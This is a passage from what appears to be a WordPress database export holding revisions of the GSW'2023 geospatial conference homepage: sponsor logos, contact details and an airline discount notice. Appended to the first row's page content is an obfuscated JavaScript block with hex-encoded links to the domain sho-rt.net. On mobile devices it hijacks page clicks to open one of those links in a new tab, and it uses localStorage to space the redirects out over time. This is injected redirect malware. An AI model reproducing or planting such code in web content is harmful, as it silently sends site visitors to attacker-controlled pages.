white;\"><strong>Tel :(+203) 5497598</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]\r\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\r\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\r\n[/vc_column_text][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-08-13 12:17:34','2023-08-13 12:17:34','',3066,'https://gsw2023.com/?p=5104',0,'revision','',0),
(5105,1,'2023-08-13 12:19:07','2023-08-13 12:19:07','<h1 style=\"text-align: center;\"><span style=\"font-size: 36pt; color: #0000ff;\"><strong>Under the auspices of </strong></span>\r\n<span style=\"font-size: 36pt; color: #0000ff;\"><strong>H.E. Professor Mostafa Madbouly,</strong></span>\r\n<span style=\"font-size: 36pt; color: #0000ff;\"><strong>Prime Minister of the Arab Republic of Egypt</strong></span></h1>\r\n[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1687219449581{margin-top: 115px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n<a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1689081933017{margin-top: 105px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\">Prime Sponsor</span></h4>\r\n&nbsp;\r\n\r\n<a href=\"https://www.tra.gov.eg/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5009 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/ntra-300x116.jpg\" alt=\"\" width=\"300\" height=\"116\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1689081968974{margin-top: 160px !important;}\"]\r\n\r\n<a href=\"https://www.mbrsc.ae/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5093 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/MBRSC-LOGO_1-01-300x149.png\" alt=\"\" width=\"300\" height=\"149\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1689081968955{margin-top: 115px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n<a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1689081337215{margin-top: 40px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\r\n&nbsp;\r\n\r\n<a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689080719428{margin-top: 0px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689081395417{margin-top: 10px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\r\n<a href=\"https://abuqir.net/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5005\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/aboquir-239x300.png\" alt=\"\" width=\"193\" height=\"242\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]\r\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096010128{margin-top: 50px !important;}\"]\r\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\r\n<span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951584642{margin-top: 45px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][vc_column_text css=\".vc_custom_1688951717998{margin-top: 90px !important;}\"]<a href=\"https://www.agisoft.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4987 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image-300x102.png\" alt=\"\" width=\"300\" height=\"102\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690459872519{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n<p style=\"text-align: center;\"><a href=\"https://www.piesat.cn/en-us/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5053\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/5X5cm-PIESAT-Logo-300x300.png\" alt=\"\" width=\"276\" height=\"276\" /></a></p>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690460056235{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\r\n&nbsp;\r\n<p style=\"text-align: center;\"><a href=\"https://www.vexcel-imaging.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4990 \" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image002.jpg\" alt=\"\" width=\"179\" height=\"213\" /></a></p>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951105389{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" />\r\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096367037{margin-top: 50px !important;}\"]</p>\r\n\r\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\r\n<a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690251276274{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\r\n<a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-e1690251327743-300x167.png\" alt=\"\" width=\"309\" height=\"172\" /></a>\r\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690452445334{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Tourism partner</span></h4>\r\n<h4 style=\"text-align: center;\"><a href=\"https://funtrip-travel.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5041\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/LOGO-FINAL2-300x184.jpg\" alt=\"\" width=\"265\" height=\"163\" /></a></h4>\r\n<p style=\"text-align: center;\">Email : <span style=\"color: #3366ff;\"><strong>gsw2023@funtrip-travel.com</strong></span></p>\r\n<p style=\"text-align: center;\">Mobile no and WhatsApp: <span style=\"color: #3366ff;\"><strong>+201221541515</strong></span></p>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Ffuntrip-travel.com%2F|title:FunTrip|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For FunTrip More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690600884765{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Exhibition organizer</span></h4>\r\n<h4 style=\"text-align: center;\"><a href=\"https://www.purespot.org/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5061\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/Logo-Pure-2-300x300.jpg\" alt=\"\" width=\"151\" height=\"151\" /></a></h4>\r\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt; color: #3366ff;\"><strong>project manager </strong></span>\r\n<span style=\"font-size: 8pt;\"><strong>Mr. Omar Mohamed</strong></span>\r\n<span style=\"font-size: 8pt;\">Email: omar.mohamed@egypure.org   </span><span style=\"font-size: 8pt;\"> phone : ⁦+20 100 098 8976⁩</span></p>\r\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt;\"><strong>Mr. Ahmed Refaat</strong></span>\r\n<span style=\"font-size: 8pt;\">Email: ahmed.refaat@egypure.org   </span><span style=\"font-size: 8pt;\">  phone :⁦+20 100 084 4792</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" 